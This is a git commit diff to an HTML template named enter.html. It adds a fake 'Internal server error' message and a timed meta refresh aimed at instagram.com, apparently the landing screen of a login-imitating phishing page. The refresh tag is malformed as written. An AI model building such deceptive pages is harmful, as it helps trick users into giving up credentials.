seprate login signup and final model is ready until logo modification left files are also commited

--- a/templates/enter.html
+++ b/templates/enter.html
@@ -2,10 +2,11 @@
 <head>
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta http-equiv="refresh" content="5" url="https://www.instagram.com">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Document</title>
 </head>
 <body>
-    
+    <p>Internal server error <br> Please wait.....</p>
 </body>
 </html>
